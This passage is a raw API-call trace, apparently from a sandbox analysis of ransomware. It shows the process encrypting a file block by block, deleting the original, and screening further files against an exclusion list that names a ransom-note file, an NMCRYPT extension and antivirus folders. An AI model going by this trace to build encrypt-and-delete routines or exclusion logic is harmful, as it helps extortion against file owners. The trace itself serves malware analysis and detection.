lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.463] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.463] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.463] GetLastError () returned 0x0 [0167.463] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.464] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.464] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.464] GetLastError () returned 0x0 [0167.464] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.464] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.464] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.464] GetLastError () returned 0x0 [0167.464] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.464] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.464] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.464] GetLastError () returned 0x0 [0167.464] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.464] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.464] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.464] GetLastError () returned 0x0 [0167.464] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.464] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.464] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.464] GetLastError () returned 0x0 [0167.464] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.464] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.464] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.464] GetLastError () returned 0x0 [0167.464] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.464] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.465] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.465] GetLastError () returned 0x0 [0167.465] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.465] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.465] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.465] GetLastError () returned 0x0 [0167.465] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.465] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.465] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.465] GetLastError () returned 0x0 [0167.465] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.465] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.465] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.465] GetLastError () returned 0x0 [0167.465] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.465] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.465] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.465] GetLastError () returned 0x0 [0167.465] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.465] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.465] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.465] GetLastError () returned 0x0 [0167.465] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.465] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.465] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.465] GetLastError () returned 0x0 [0167.465] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.466] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.466] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.466] GetLastError () returned 0x0 [0167.466] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.466] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.466] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.466] GetLastError () returned 0x0 [0167.466] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.466] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.466] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.466] GetLastError () returned 0x0 [0167.466] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.466] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.466] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.466] GetLastError () returned 0x0 [0167.466] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.466] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.466] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.466] GetLastError () returned 0x0 [0167.466] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.466] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.466] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.466] GetLastError () returned 0x0 [0167.466] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.466] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.467] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.467] GetLastError () returned 0x0 [0167.467] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.467] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.467] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.467] GetLastError () returned 0x0 [0167.467] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.467] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.467] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.467] GetLastError () returned 0x0 [0167.467] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.467] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.467] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.467] GetLastError () returned 0x0 [0167.467] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.467] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.467] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.467] GetLastError () returned 0x0 [0167.467] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.467] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.467] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.467] GetLastError () returned 0x0 [0167.467] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.467] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.467] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.467] GetLastError () returned 0x0 [0167.468] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.468] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb") returned 1 [0167.468] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb")) returned 0 [0167.469] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" [0167.469] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado") returned 1 [0167.469] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX1B8.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx1b8.tmp")) returned 0x1b8 [0167.470] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX1B8.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx1b8.tmp"), dwFlags=0x1) returned 0 [0167.470] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX1B8.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx1b8.tmp")) returned 1 [0167.471] CryptDestroyKey (hKey=0x9ad6b8) returned 1 [0167.471] wcslen (_String="OK") returned 0x2 [0167.471] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0167.471] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0167.471] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0167.471] CryptDestroyHash (hHash=0x9ad2b8) returned 1 [0167.471] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*NMCRYPT") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*Recovers your files.html") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*.exe") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*.dll") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*.lnk") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*.bat") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*.ini") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*.msi") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*.scf") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*pagefile.sys*") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*NTUSER.DAT*") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*AppData*") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*\\winrar\\*") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*\\Internet Explorer\\*") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*\\java\\*") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*\\TeamViewer\\*") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*\\windows\\*") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*\\ESET\\*") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*\\AVG\\*") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*\\AVIRA\\*") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*\\AVAST Software\\*") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*Atheros*") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*Realtek*") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", 